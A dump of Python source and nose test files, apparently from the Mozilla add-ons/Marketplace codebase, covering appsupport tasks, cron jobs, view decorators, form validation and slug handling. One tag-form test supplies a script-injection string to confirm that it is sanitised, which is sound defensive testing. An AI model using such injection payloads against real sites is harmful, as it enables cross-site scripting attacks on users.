@transaction.commit_on_success
def update_appsupport(ids):
log.info("[%s@None] Updating appsupport for %s." % (len(ids), ids))
delete = 'DELETE FROM appsupport WHERE addon_id IN (%s)'
insert = """INSERT INTO appsupport
(addon_id, app_id, min, max, created, modified)
VALUES %s"""
addons = Addon.objects.no_cache().filter(id__in=ids).no_transforms()
apps = []
for addon in addons:
for app, appver in addon.compatible_apps.items():
if appver is None:
# Fake support for all version ranges.
min_, max_ = 0, 999999999999999999
else:
min_, max_ = appver.min.version_int, appver.max.version_int
apps.append((addon.id, app.id, min_, max_))
s = ','.join('(%s, %s, %s, %s, NOW(), NOW())' % x for x in apps)
if not apps:
return
cursor = connection.cursor()
cursor.execute(delete % ','.join(map(str, ids)))
cursor.execute(insert % s)
# All our updates were sql, so invalidate manually.
Addon.objects.invalidate(*addons)
@task
def delete_preview_files(id, **kw):
log.info('[1@None] Removing preview with id of %s.' % id)
p = Preview(id=id)
for f in (p.thumbnail_path, p.image_path):
try:
storage.delete(f)
except Exception, e:
log.error('Error deleting preview file (%s): %s' % (f, e))
########NEW FILE########
__FILENAME__ = test_addon_utils
from nose.tools import eq_
import amo.tests
from addons.models import Addon
from addons.utils import reverse_name_lookup
class TestReverseNameLookup(amo.tests.TestCase):
fixtures = ('base/addon_3615',)
def setUp(self):
super(TestReverseNameLookup, self).setUp()
self.addon = Addon.objects.get()
def test_delete_addon(self):
eq_(reverse_name_lookup('Delicious Bookmarks'), 3615)
self.addon.delete('farewell my sweet amo, it was a good run')
eq_(reverse_name_lookup('Delicious Bookmarks'), None)
def test_update_addon(self):
eq_(reverse_name_lookup('Delicious Bookmarks'), 3615)
self.addon.name = 'boo'
self.addon.save()
eq_(reverse_name_lookup('Delicious Bookmarks'), None)
eq_(reverse_name_lookup('boo'), 3615)
def test_get_strip(self):
eq_(reverse_name_lookup('Delicious Bookmarks '), 3615)
def test_get_case(self):
eq_(reverse_name_lookup('delicious bookmarks'), 3615)
def test_addon_and_app_namespaces(self):
eq_(reverse_name_lookup('Delicious Bookmarks', webapp=False), 3615)
eq_(reverse_name_lookup('Delicious Bookmarks', webapp=True), None)
# Note: The factory creates the app which calls the reverse_name_lookup
# in a post_save signal, so no need to call it explicitly here.
app = amo.tests.addon_factory(type=amo.ADDON_WEBAPP)
self.assertTrue(app.is_webapp())
eq_(reverse_name_lookup(app.name, webapp=False), None)
eq_(reverse_name_lookup(app.name, webapp=True), app.id)
# Show we can also create an app with the same name as an addon
name = 'Delicious Bookmarks'
app = amo.tests.addon_factory(name=name, type=amo.ADDON_WEBAPP)
self.assertTrue(app.is_webapp())
eq_(reverse_name_lookup(name, webapp=False), 3615)
eq_(reverse_name_lookup(name, webapp=True), app.id)
########NEW FILE########
__FILENAME__ = test_cron
import mock
from nose.tools import eq_
import amo
import amo.tests
from addons import cron
from addons.models import Addon, AppSupport
from files.models import File, Platform
from versions.models import Version
class CurrentVersionTestCase(amo.tests.TestCase):
fixtures = ['base/addon_3615']
@mock.patch('waffle.switch_is_active', lambda x: True)
def test_addons(self):
Addon.objects.filter(pk=3615).update(_current_version=None)
eq_(Addon.objects.filter(_current_version=None, pk=3615).count(), 1)
cron._update_addons_current_version(((3615,),))
eq_(Addon.objects.filter(_current_version=None, pk=3615).count(), 0)
@mock.patch('waffle.switch_is_active', lambda x: True)
def test_cron(self):
Addon.objects.filter(pk=3615).update(_current_version=None)
eq_(Addon.objects.filter(_current_version=None, pk=3615).count(), 1)
cron.update_addons_current_version()
eq_(Addon.objects.filter(_current_version=None, pk=3615).count(), 0)
class TestLastUpdated(amo.tests.TestCase):
fixtures = ['base/addon_3615', 'addons/listed', 'base/apps',
'base/seamonkey', 'base/thunderbird']
def test_catchall(self):
"""Make sure the catch-all last_updated is stable and accurate."""
# Nullify all datestatuschanged so the public add-ons hit the
# catch-all.
(File.objects.filter(status=amo.STATUS_PUBLIC)
.update(datestatuschanged=None))
Addon.objects.update(last_updated=None)
cron.addon_last_updated()
for addon in Addon.objects.filter(status=amo.STATUS_PUBLIC,
type=amo.ADDON_EXTENSION):
eq_(addon.last_updated, addon.created)
# Make sure it's stable.
cron.addon_last_updated()
for addon in Addon.objects.filter(status=amo.STATUS_PUBLIC):
eq_(addon.last_updated, addon.created)
def test_last_updated_lite(self):
# Make sure lite addons' last_updated matches their file's
# datestatuschanged.
Addon.objects.update(status=amo.STATUS_LITE, last_updated=None)
File.objects.update(status=amo.STATUS_LITE)
cron.addon_last_updated()
addon = Addon.objects.get(id=3615)
files = File.objects.filter(version__addon=addon)
eq_(len(files), 1)
eq_(addon.last_updated, files[0].datestatuschanged)
assert addon.last_updated
def test_last_update_lite_no_files(self):
Addon.objects.update(status=amo.STATUS_LITE, last_updated=None)
File.objects.update(status=amo.STATUS_UNREVIEWED)
cron.addon_last_updated()
addon = Addon.objects.get(id=3615)
eq_(addon.last_updated, addon.created)
assert addon.last_updated
def test_appsupport(self):
ids = Addon.objects.values_list('id', flat=True)
cron._update_appsupport(ids)
eq_(AppSupport.objects.filter(app=amo.FIREFOX.id).count(), 4)
# Run it again to test deletes.
cron._update_appsupport(ids)
eq_(AppSupport.objects.filter(app=amo.FIREFOX.id).count(), 4)
def test_appsupport_listed(self):
AppSupport.objects.all().delete()
eq_(AppSupport.objects.filter(addon=3723).count(), 0)
cron.update_addon_appsupport()
eq_(AppSupport.objects.filter(addon=3723,
app=amo.FIREFOX.id).count(), 0)
def test_appsupport_seamonkey(self):
addon = Addon.objects.get(pk=15663)
addon.update(status=amo.STATUS_PUBLIC)
AppSupport.objects.all().delete()
cron.update_addon_appsupport()
eq_(AppSupport.objects.filter(addon=15663,
app=amo.SEAMONKEY.id).count(), 1)
class TestHideDisabledFiles(amo.tests.TestCase):
msg = 'Moving disabled file: %s => %s'
def setUp(self):
self.p = Platform.objects.create(id=amo.PLATFORM_ALL.id)
self.addon = Addon.objects.create(type=amo.ADDON_EXTENSION)
self.version = Version.objects.create(addon=self.addon)
self.f1 = File.objects.create(version=self.version, platform=self.p,
filename='f1')
self.f2 = File.objects.create(version=self.version, filename='f2',
platform=self.p)
@mock.patch('files.models.os')
def test_leave_nondisabled_files(self, os_mock):
# All these addon/file status pairs should stay.
stati = [(amo.STATUS_PUBLIC, amo.STATUS_PUBLIC),
(amo.STATUS_PUBLIC, amo.STATUS_UNREVIEWED),
(amo.STATUS_PUBLIC, amo.STATUS_BETA),
(amo.STATUS_LITE, amo.STATUS_UNREVIEWED),
(amo.STATUS_LITE, amo.STATUS_LITE),
(amo.STATUS_LITE_AND_NOMINATED, amo.STATUS_UNREVIEWED),
(amo.STATUS_LITE_AND_NOMINATED, amo.STATUS_LITE)]
for addon_status, file_status in stati:
self.addon.update(status=addon_status)
File.objects.update(status=file_status)
cron.hide_disabled_files()
assert not os_mock.path.exists.called, (addon_status, file_status)
@mock.patch('files.models.File.mv')
@mock.patch('files.models.storage')
def test_move_user_disabled_addon(self, m_storage, mv_mock):
# Use Addon.objects.update so the signal handler isn't called.
Addon.objects.filter(id=self.addon.id).update(
status=amo.STATUS_PUBLIC, disabled_by_user=True)
File.objects.update(status=amo.STATUS_PUBLIC)
cron.hide_disabled_files()
# Check that f2 was moved.
f2 = self.f2
mv_mock.assert_called_with(f2.file_path, f2.guarded_file_path,
self.msg)
# Check that f1 was moved as well.
f1 = self.f1
mv_mock.call_args = mv_mock.call_args_list[0]
m_storage.delete.call_args = m_storage.delete.call_args_list[0]
mv_mock.assert_called_with(f1.file_path, f1.guarded_file_path,
self.msg)
# There's only 2 files, both should have been moved.
eq_(mv_mock.call_count, 2)
eq_(m_storage.delete.call_count, 2)
@mock.patch('files.models.File.mv')
@mock.patch('files.models.storage')
def test_move_admin_disabled_addon(self, m_storage, mv_mock):
Addon.objects.filter(id=self.addon.id).update(
status=amo.STATUS_DISABLED)
File.objects.update(status=amo.STATUS_PUBLIC)
cron.hide_disabled_files()
# Check that f2 was moved.
f2 = self.f2
mv_mock.assert_called_with(f2.file_path, f2.guarded_file_path,
self.msg)
# Check that f1 was moved as well.
f1 = self.f1
mv_mock.call_args = mv_mock.call_args_list[0]
m_storage.delete.call_args = m_storage.delete.call_args_list[0]
mv_mock.assert_called_with(f1.file_path, f1.guarded_file_path,
self.msg)
# There's only 2 files, both should have been moved.
eq_(mv_mock.call_count, 2)
eq_(m_storage.delete.call_count, 2)
@mock.patch('files.models.File.mv')
@mock.patch('files.models.storage')
def test_move_disabled_file(self, m_storage, mv_mock):
Addon.objects.filter(id=self.addon.id).update(status=amo.STATUS_LITE)
File.objects.filter(id=self.f1.id).update(status=amo.STATUS_DISABLED)
File.objects.filter(id=self.f2.id).update(status=amo.STATUS_UNREVIEWED)
cron.hide_disabled_files()
# Only f1 should have been moved.
f1 = self.f1
mv_mock.assert_called_with(f1.file_path, f1.guarded_file_path,
self.msg)
eq_(mv_mock.call_count, 1)
@mock.patch('files.models.File.mv')
@mock.patch('files.models.storage')
def test_ignore_deleted_versions(self, m_storage, mv_mock):
# Apps only have 1 file and version delete only deletes one.
self.f1.delete()
self.version.delete()
mv_mock.reset_mock()
# Create a new version/file just like the one we deleted.
version = Version.objects.create(addon=self.addon)
File.objects.create(version=version, platform=self.p, filename='f2')
cron.hide_disabled_files()
# Mock shouldn't have been called.
assert not mv_mock.called, mv_mock.call_args
########NEW FILE########
__FILENAME__ = test_decorators
from django import http
from django.core.exceptions import PermissionDenied
import mock
from nose.tools import eq_
from test_utils import RequestFactory
import amo.tests
from addons import decorators as dec
from addons.models import Addon
class TestAddonView(amo.tests.TestCase):
def setUp(self):
self.addon = Addon.objects.create(slug='x', type=1)
self.func = mock.Mock()
self.func.return_value = mock.sentinel.OK
self.func.__name__ = 'mock_function'
self.view = dec.addon_view(self.func)
self.request = mock.Mock()
self.slug_path = '/addon/%s/reviews' % self.addon.slug
self.request.path = self.id_path = '/addon/%s/reviews' % self.addon.id
self.request.GET = {}
def test_301_by_id(self):
res = self.view(self.request, str(self.addon.id))
self.assert3xx(res, self.slug_path, 301)
def test_slug_replace_no_conflict(self):
self.request.path = '/addon/{id}/reviews/{id}345/path'.format(
id=self.addon.id)
res = self.view(self.request, str(self.addon.id))
self.assert3xx(res, '/addon/{slug}/reviews/{id}345/path'.format(
id=self.addon.id, slug=self.addon.slug), 301)
def test_301_with_querystring(self):
self.request.GET = mock.Mock()
self.request.GET.urlencode.return_value = 'q=1'
res = self.view(self.request, str(self.addon.id))
self.assert3xx(res, self.slug_path + '?q=1', 301)
def test_200_by_slug(self):
res = self.view(self.request, self.addon.slug)
eq_(res, mock.sentinel.OK)
def test_404_by_id(self):
with self.assertRaises(http.Http404):
self.view(self.request, str(self.addon.id * 2))
def test_404_by_slug(self):
with self.assertRaises(http.Http404):
self.view(self.request, self.addon.slug + 'xx')
def test_alternate_qs_301_by_id(self):
qs = lambda: Addon.objects.filter(type=1)
view = dec.addon_view_factory(qs=qs)(self.func)
res = view(self.request, str(self.addon.id))
self.assert3xx(res, self.slug_path, 301)
def test_alternate_qs_200_by_slug(self):
qs = lambda: Addon.objects.filter(type=1)
view = dec.addon_view_factory(qs=qs)(self.func)
res = view(self.request, self.addon.slug)
eq_(res, mock.sentinel.OK)
def test_alternate_qs_404_by_id(self):
qs = lambda: Addon.objects.filter(type=2)
view = dec.addon_view_factory(qs=qs)(self.func)
with self.assertRaises(http.Http404):
view(self.request, str(self.addon.id))
def test_alternate_qs_404_by_slug(self):
qs = lambda: Addon.objects.filter(type=2)
view = dec.addon_view_factory(qs=qs)(self.func)
with self.assertRaises(http.Http404):
view(self.request, self.addon.slug)
def test_addon_no_slug(self):
app = Addon.objects.create(type=1, name='xxxx')
res = self.view(self.request, app.slug)
eq_(res, mock.sentinel.OK)
def test_slug_isdigit(self):
app = Addon.objects.create(type=1, name='xxxx')
app.update(slug=str(app.id))
r = self.view(self.request, app.slug)
eq_(r, mock.sentinel.OK)
request, addon = self.func.call_args[0]
eq_(addon, app)
def test_app(self):
app = amo.tests.app_factory(name='xxxx')
app.update(slug=str(app.id) + 'foo', app_slug=str(app.id))
res = self.view(self.request, app_slug=str(app.id))
eq_(res, mock.sentinel.OK)
eq_(self.func.call_args[0][1].type, amo.ADDON_WEBAPP)
class TestPremiumDecorators(amo.tests.TestCase):
def setUp(self):
self.addon = mock.Mock(pk=1)
self.func = mock.Mock()
self.func.return_value = True
self.func.__name__ = 'mock_function'
self.request = RequestFactory().get('/')
self.request.amo_user = mock.Mock()
def test_cant_become_premium(self):
self.addon.can_become_premium.return_value = False
view = dec.can_become_premium(self.func)
with self.assertRaises(PermissionDenied):
view(self.request, self.addon.pk, self.addon)
def test_can_become_premium(self):
self.addon.can_become_premium.return_value = True
view = dec.can_become_premium(self.func)
eq_(view(self.request, self.addon.pk, self.addon), True)
def test_has_purchased(self):
view = dec.has_purchased(self.func)
self.addon.is_premium.return_value = True
self.addon.has_purchased.return_value = True
eq_(view(self.request, self.addon), True)
def test_has_purchased_failure(self):
view = dec.has_purchased(self.func)
self.addon.is_premium.return_value = True
self.addon.has_purchased.return_value = False
with self.assertRaises(PermissionDenied):
view(self.request, self.addon)
########NEW FILE########
__FILENAME__ = test_forms
# -*- coding: utf-8 -*-
import os
import tempfile
from mock import patch
from nose.tools import eq_
from django.conf import settings
from django.core.files.storage import default_storage as storage
import amo
import amo.tests
from amo.tests.test_helpers import get_image_path
from amo.utils import rm_local_tmp_dir
from addons import forms
from addons.models import Addon, Category
from tags.models import Tag, AddonTag
from mkt.files.helpers import copyfileobj
class FormsTest(amo.tests.TestCase):
fixtures = ('base/addon_3615', 'base/addon_3615_categories',
'addons/blacklisted')
def setUp(self):
super(FormsTest, self).setUp()
self.existing_name = 'Delicious Bookmarks'
self.non_existing_name = 'Does Not Exist'
self.error_msg = 'This name is already in use. Please choose another.'
def test_new(self):
"""
New add-ons should be able to use non-existing add-on names.
"""
f = forms.AddonForm(dict(name=self.non_existing_name))
f.is_valid()
eq_(f.errors.get('name'), None)
def test_new_existing(self):
"""
New add-ons shouldn't be able to use existing add-on names.
"""
f = forms.AddonForm(dict(name=self.existing_name))
assert not f.is_valid()
eq_(f.errors['name'][0], self.error_msg)
def test_old(self):
"""
Exiting add-ons shouldn't be able to use someone else's name.
"""
a = Addon.objects.create(type=1)
f = forms.AddonFormBasic(dict(name=self.existing_name), request=None,
instance=a)
assert not f.is_valid()
eq_(f.errors.get('name')[0][1], self.error_msg)
def test_old_same(self):
"""
Exiting add-ons should be able to re-use their name.
"""
delicious = Addon.objects.get()
f = forms.AddonFormBasic(dict(name=self.existing_name), request=None,
instance=delicious)
f.is_valid()
eq_(f.errors.get('name'), None)
def test_locales(self):
form = forms.AddonFormDetails(request={})
eq_(form.fields['default_locale'].choices[0][0], 'af')
def test_slug_blacklist(self):
delicious = Addon.objects.get()
form = forms.AddonFormBasic({'slug': 'submit'}, request=None,
instance=delicious)
assert not form.is_valid()
eq_(form.errors['slug'],
[u'The slug cannot be "submit". Please choose another.'])
def test_slug_isdigit(self):
delicious = Addon.objects.get()
form = forms.AddonFormBasic({'slug': '123'}, request=None,
instance=delicious)
assert not form.is_valid()
eq_(form.errors['slug'],
[u'The slug cannot be "123". Please choose another.'])
class TestTagsForm(amo.tests.TestCase):
fixtures = ['base/addon_3615', 'base/platforms', 'base/users']
def setUp(self):
self.addon = Addon.objects.get(pk=3615)
category = Category.objects.get(pk=22)
category.name = 'test'
category.save()
self.data = {
'summary': str(self.addon.summary),
'name': str(self.addon.name),
'slug': self.addon.slug,
}
self.user = self.addon.authors.all()[0]
amo.set_user(self.user)
def add_tags(self, tags):
data = self.data.copy()
data.update({'tags': tags})
form = forms.AddonFormBasic(data=data, request=None,
instance=self.addon)
assert form.is_valid()
form.save(self.addon)
return form
def get_tag_text(self):
return [t.tag_text for t in self.addon.tags.no_cache().all()]
def test_tags(self):
self.add_tags('foo, bar')
eq_(self.get_tag_text(), ['bar', 'foo'])
def test_tags_xss(self):
self.add_tags('<script>alert("foo")</script>, bar')
eq_(self.get_tag_text(), ['bar', 'scriptalertfooscript'])
def test_tags_case_spaces(self):
self.add_tags('foo, bar')
self.add_tags('foo, bar , Bar, BAR, b a r ')
eq_(self.get_tag_text(), ['b a r', 'bar', 'foo'])
def test_tags_spaces(self):
self.add_tags('foo, bar beer')
eq_(self.get_tag_text(), ['bar beer', 'foo'])
def test_tags_unicode(self):
self.add_tags(u'Österreich')
eq_(self.get_tag_text(), [u'Österreich'.lower()])
def add_restricted(self, *args):
if not args:
args = ['restartless']
for arg in args:
tag = Tag.objects.create(tag_text=arg, restricted=True)
AddonTag.objects.create(tag=tag, addon=self.addon)
def test_tags_restricted(self):
self.add_restricted()
self.add_tags('foo, bar')
form = forms.AddonFormBasic(data=self.data, request=None,
instance=self.addon)
eq_(form.fields['tags'].initial, 'bar, foo')
eq_(self.get_tag_text(), ['bar', 'foo', 'restartless'])
self.add_tags('')
eq_(self.get_tag_text(), ['restartless'])
def test_tags_error(self):
self.add_restricted('restartless', 'sdk')
data = self.data.copy()
data.update({'tags': 'restartless'})
form = forms.AddonFormBasic(data=data, request=None,
instance=self.addon)
eq_(form.errors['tags'][0],
'"restartless" is a reserved tag and cannot be used.')
data.update({'tags': 'restartless, sdk'})
form = forms.AddonFormBasic(data=data, request=None,
instance=self.addon)
eq_(form.errors['tags'][0],
'"restartless", "sdk" are reserved tags and cannot be used.')
@patch('access.acl.action_allowed')
def test_tags_admin_restricted(self, action_allowed):
action_allowed.return_value = True
self.add_restricted('restartless')
self.add_tags('foo, bar')
eq_(self.get_tag_text(), ['bar', 'foo'])
self.add_tags('foo, bar, restartless')
eq_(self.get_tag_text(), ['bar', 'foo', 'restartless'])
form = forms.AddonFormBasic(data=self.data, request=None,
instance=self.addon)
eq_(form.fields['tags'].initial, 'bar, foo, restartless')
@patch('access.acl.action_allowed')
def test_tags_admin_restricted_count(self, action_allowed):
action_allowed.return_value = True
self.add_restricted()
self.add_tags('restartless, %s' % (', '.join('tag-test-%s' %
i for i in range(0, 20))))
def test_tags_restricted_count(self):
self.add_restricted()
self.add_tags(', '.join('tag-test-%s' % i for i in range(0, 20)))
def test_tags_slugified_count(self):
self.add_tags(', '.join('tag-test' for i in range(0, 21)))
eq_(self.get_tag_text(), ['tag-test'])
def test_tags_limit(self):
self.add_tags(' %s' % ('t' * 128))
def test_tags_long(self):
tag = ' -%s' % ('t' * 128)
data = self.data.copy()
data.update({"tags": tag})
form = forms.AddonFormBasic(data=data, request=None,
instance=self.addon)
assert not form.is_valid()
eq_(form.errors['tags'], ['All tags must be 128 characters or less'
' after invalid characters are removed.'])
class TestIconForm(amo.tests.TestCase):
fixtures = ['base/addon_3615']
# TODO: AddonFormMedia save() method could do with cleaning up
# so this isn't necessary
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.addon = Addon.objects.get(pk=3615)
class DummyRequest:
FILES = None
self.request = DummyRequest()
self.icon_path = os.path.join(settings.TMP_PATH, 'icon')
if not os.path.exists(self.icon_path):
os.makedirs(self.icon_path)
def tearDown(self):
rm_local_tmp_dir(self.temp_dir)
def get_icon_paths(self):
path = os.path.join(self.addon.get_icon_dir(), str(self.addon.id))
return ['%s-%s.png' % (path, size) for size in amo.ADDON_ICON_SIZES]
@patch('apps.addons.models.Addon.get_icon_dir')
def testIconUpload(self, get_icon_dir):
# TODO(gkoberger): clarify this please.
# We no longer use AddonFormMedia to upload icons, so
# skipping until I can ask andym what the point of this
# test is. Additionally, it's called "TestIconRemoval",
# but it doesn't seem to remove icons.
return
get_icon_dir.return_value = self.temp_dir
for path in self.get_icon_paths():
assert not os.path.exists(path)
img = get_image_path('non-animated.png')
data = {'icon_upload': img, 'icon_type': 'text/png'}
self.request.FILES = {'icon_upload': open(img)}
form = forms.AddonFormMedia(data=data, request=self.request,
instance=self.addon)
assert form.is_valid()
form.save(self.addon)
for path in self.get_icon_paths():
assert os.path.exists(path)
@patch('amo.models.ModelBase.update')
def test_icon_modified(self, update_mock):
name = 'transparent.png'
form = forms.AddonFormMedia({'icon_upload_hash': name},
request=self.request,
instance=self.addon)
dest = os.path.join(self.icon_path, name)
with storage.open(dest, 'w') as f:
copyfileobj(open(get_image_path(name)), f)
assert form.is_valid()
form.save(addon=self.addon)
assert update_mock.called
class TestCategoryForm(amo.tests.TestCase):
fixtures = ['base/apps']
def test_no_possible_categories(self):
Category.objects.create(type=amo.ADDON_SEARCH,
application_id=amo.FIREFOX.id)
addon = Addon.objects.create(type=amo.ADDON_SEARCH)
form = forms.CategoryFormSet(addon=addon)
apps = [f.app for f in form.forms]
eq_(apps, [amo.FIREFOX])
########NEW FILE########
__FILENAME__ = test_helpers
from mock import Mock
from nose.tools import eq_
from pyquery import PyQuery
import amo
import amo.tests
from addons.helpers import contribution, flag, statusflags
from addons.models import Addon
class TestHelpers(amo.tests.TestCase):
fixtures = ['base/addon_3615', 'base/users',
'addons/featured', 'base/collections',
'base/featured']
def test_statusflags(self):
ctx = {'APP': amo.FIREFOX, 'LANG': 'en-US'}
# unreviewed
a = Addon(status=amo.STATUS_UNREVIEWED)
eq_(statusflags(ctx, a), 'unreviewed')
# recommended
featured = Addon.objects.get(pk=1003)
eq_(statusflags(ctx, featured), 'featuredaddon')
# category featured
featured = Addon.objects.get(pk=1001)
eq_(statusflags(ctx, featured), 'featuredaddon')
def test_flags(self):
ctx = {'APP': amo.FIREFOX, 'LANG': 'en-US'}
# unreviewed
a = Addon(status=amo.STATUS_UNREVIEWED)
eq_(flag(ctx, a), '<h5 class="flag">Not Reviewed</h5>')
# recommended
featured = Addon.objects.get(pk=1003)
eq_(flag(ctx, featured), '<h5 class="flag">Featured</h5>')
# category featured
featured = Addon.objects.get(pk=1001)
eq_(flag(ctx, featured), '<h5 class="flag">Featured</h5>')
def test_contribution_box(self):
a = Addon.objects.get(pk=7661)
a.suggested_amount = '12'
settings = Mock()
settings.MAX_CONTRIBUTION = 5
request = Mock()
request.GET = {'src': 'direct'}
c = {'LANG': 'en-us', 'APP': amo.FIREFOX, 'settings': settings,
'request': request}
s = contribution(c, a)
doc = PyQuery(s)
# make sure input boxes are rendered correctly (bug 555867)
assert doc('input[name=onetime-amount]').length == 1
def test_src_retained(self):
a = Addon.objects.get(pk=7661)
a.suggested_amount = '12'
settings = Mock()
settings.MAX_CONTRIBUTION = 5
request = Mock()
c = {'LANG': 'en-us', 'APP': amo.FIREFOX, 'settings': settings,
'request': request}
s = contribution(c, a, contribution_src='browse')
doc = PyQuery(s)
eq_(doc('input[name=source]').attr('value'), 'browse')
########NEW FILE########
__FILENAME__ = test_models
# -*- coding: utf-8 -*-
import json
import os
import tempfile
import time
from contextlib import nested
from datetime import datetime, timedelta
from urlparse import urlparse
from django import forms
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from django.core import mail
from django.core.exceptions import ValidationError
from django.utils import translation
from mock import Mock, patch
from nose.tools import assert_not_equal, eq_, raises
import amo
import amo.tests
from addons.models import (Addon, AddonCategory, AddonDeviceType, AddonType,
AddonUpsell, AddonUser, AppSupport, BlacklistedSlug,
Category, Preview)
from amo import set_user
from amo.helpers import absolutify
from amo.signals import _connect, _disconnect
from applications.models import Application, AppVersion
from constants.applications import DEVICE_TYPES
from devhub.models import ActivityLog
from editors.models import EscalationQueue
from files.models import File, Platform
from files.tests.test_models import UploadTest
from reviews.models import Review
from translations.models import Translation, TranslationSequence
from users.models import UserProfile
from versions.compare import version_int
from versions.models import ApplicationsVersions, Version
from mkt.webapps.models import Webapp
from mkt.prices.models import AddonPaymentData, AddonPremium, Price
class TestCleanSlug(amo.tests.TestCase):
def test_clean_slug_new_object(self):
# Make sure there's at least an addon with the "addon" slug, subsequent
# ones should be "addon-1", "addon-2" ...
a = Addon.objects.create()
eq_(a.slug, "addon")
# Start with a first clash. This should give us "addon-1".
# We're not saving yet, we're testing the slug creation without an id.
b = Addon()
b.clean_slug()
eq_(b.slug, 'addon-1')
# Now save the instance to the database for future clashes.
b.save()
# Test on another object without an id.
c = Addon()
c.clean_slug()
eq_(c.slug, 'addon-2')
# Even if an addon is deleted, don't clash with its slug.
c.status = amo.STATUS_DELETED
# Now save the instance to the database for future clashes.
c.save()
# And yet another object without an id. Make sure we're not trying to
# assign the 'addon-2' slug from the deleted addon.
d = Addon()
d.clean_slug()
eq_(d.slug, 'addon-3')
def test_clean_slug_with_id(self):
# Create an addon and save it to have an id.
a = Addon.objects.create()
# Start over: don't use the name nor the id to generate the slug.
a.slug = a.name = ""
a.clean_slug()
# Slugs created from an id are of the form "id~", eg "123~" to avoid
# clashing with URLs.
eq_(a.slug, "%s~" % a.id)
# And again, this time make it clash.
b = Addon.objects.create()
# Set a's slug to be what should be created for b from its id.
a.slug = "%s~" % b.id
a.save()
# Now start over for b.
b.slug = b.name = ""
b.clean_slug()
eq_(b.slug, "%s~-1" % b.id)
def test_clean_slug_with_name(self):
# Make sure there's at least an addon with the "fooname" slug,
# subsequent ones should be "fooname-1", "fooname-2" ...
a = Addon.objects.create(name="fooname")
eq_(a.slug, "fooname")
b = Addon(name="fooname")
b.clean_slug()
eq_(b.slug, "fooname-1")
def test_clean_slug_with_slug(self):
# Make sure there's at least an addon with the "fooslug" slug,
# subsequent ones should be "fooslug-1", "fooslug-2" ...
a = Addon.objects.create(name="fooslug")
eq_(a.slug, "fooslug")
b = Addon(name="fooslug")
b.clean_slug()
eq_(b.slug, "fooslug-1")
def test_clean_slug_blacklisted_slug(self):
blacklisted_slug = 'fooblacklisted'
BlacklistedSlug.objects.create(name=blacklisted_slug)
a = Addon(slug=blacklisted_slug)
a.clean_slug()
# Blacklisted slugs (like "activate" or IDs) have a "~" appended to
# avoid clashing with URLs.
eq_(a.slug, "%s~" % blacklisted_slug)
# Now save the instance to the database for future clashes.
a.save()
b = Addon(slug=blacklisted_slug)
b.clean_slug()
eq_(b.slug, "%s~-1" % blacklisted_slug)
def test_clean_slug_blacklisted_slug_long_slug(self):
long_slug = "this_is_a_very_long_slug_that_is_longer_than_thirty_chars"
BlacklistedSlug.objects.create(name=long_slug[:30])
# If there's no clashing slug, just append a "~".
a = Addon.objects.create(slug=long_slug[:30])
eq_(a.slug, "%s~" % long_slug[:29])
# If there's a clash, use the standard clash resolution.
a = Addon.objects.create(slug=long_slug[:30])
eq_(a.slug, "%s-1" % long_slug[:27])
def test_clean_slug_long_slug(self):
long_slug = "this_is_a_very_long_slug_that_is_longer_than_thirty_chars"
# If there's no clashing slug, don't over-shorten it.
a = Addon.objects.create(slug=long_slug)
eq_(a.slug, long_slug[:30])
# Now that there is a clash, test the clash resolution.
b = Addon(slug=long_slug)
b.clean_slug()
eq_(b.slug, "%s-1" % long_slug[:27])
def test_clean_slug_always_slugify(self):
illegal_chars = "some spaces and !?@"
# Slugify if there's a slug provided.
a = Addon(slug=illegal_chars)
a.clean_slug()
assert a.slug.startswith("some-spaces-and"), a.slug
# Also slugify if there's no slug provided.
b = Addon(name=illegal_chars)
b.clean_slug()
assert b.slug.startswith("some-spaces-and"), b.slug
def test_clean_slug_worst_case_scenario(self):
long_slug = "this_is_a_very_long_slug_that_is_longer_than_thirty_chars"
# Generate 100 addons with this very long slug. We should encounter the
# worst case scenario where all the available clashes have been
# avoided. Check the comment in addons.models.clean_slug, in the "else"
# part of the "for" loop checking for available slugs not yet assigned.
for i in range(100):
Addon.objects.create(slug=long_slug)
with self.assertRaises(RuntimeError): # Fail on the 100th clash.
Addon.objects.create(slug=long_slug)
class TestAddonManager(amo.tests.TestCase):
fixtures = ['base/apps', 'base/appversion', 'base/users',
'base/addon_3615', 'addons/featured', 'addons/test_manager',
'base/collections', 'base/featured',
'base/addon_5299_gcal']
def setUp(self):
set_user(None)
def test_featured(self):
eq_(Addon.objects.featured(amo.FIREFOX).count(), 3)
def test_listed(self):
# We need this for the fixtures, but it messes up the tests.
Addon.objects.get(pk=3615).update(disabled_by_user=True)
# No continue as normal.
Addon.objects.filter(id=5299).update(disabled_by_user=True)
q = Addon.objects.listed(amo.FIREFOX, amo.STATUS_PUBLIC)
eq_(len(q.all()), 4)
addon = q[0]
eq_(addon.id, 2464)
# Disabling hides it.
addon.disabled_by_user = True
addon.save()
# Should be 3 now, since the one is now disabled.
eq_(q.count(), 3)
# If we search for public or unreviewed we find it.
addon.disabled_by_user = False
addon.status = amo.STATUS_UNREVIEWED
addon.save()
eq_(q.count(), 3)
eq_(Addon.objects.listed(amo.FIREFOX, amo.STATUS_PUBLIC,
amo.STATUS_UNREVIEWED).count(), 4)
# Can't find it without a file.
addon.versions.get().files.get().delete()
eq_(q.count(), 3)
def test_public(self):
public = Addon.objects.public()
for a in public:
assert_not_equal(
a.id, 3, 'public() must not return unreviewed add-ons')
def test_reviewed(self):
for a in Addon.objects.reviewed():
assert a.status in amo.REVIEWED_STATUSES, (a.id, a.status)
def test_unreviewed(self):
"""
Tests for unreviewed addons.
"""
exp = Addon.objects.unreviewed()
for addon in exp:
assert addon.status in amo.UNREVIEWED_STATUSES, (
'unreviewed() must return unreviewed addons.')
def test_valid(self):
addon = Addon.objects.get(pk=5299)
addon.update(disabled_by_user=True)
objs = Addon.objects.valid()
for addon in objs:
assert addon.status in amo.LISTED_STATUSES
assert not addon.disabled_by_user
def test_top_free_public(self):
addons = list(Addon.objects.listed(amo.FIREFOX))
eq_(list(Addon.objects.top_free(amo.FIREFOX)),
sorted(addons, key=lambda x: x.weekly_downloads, reverse=True))
eq_(list(Addon.objects.top_free(amo.THUNDERBIRD)), [])
def test_top_free_all(self):
addons = list(Addon.objects.filter(appsupport__app=amo.FIREFOX.id)
.exclude(premium_type__in=amo.ADDON_PREMIUMS)
.exclude(addonpremium__price__price__isnull=False))
eq_(list(Addon.objects.top_free(amo.FIREFOX, listed=False)),
sorted(addons, key=lambda x: x.weekly_downloads, reverse=True))
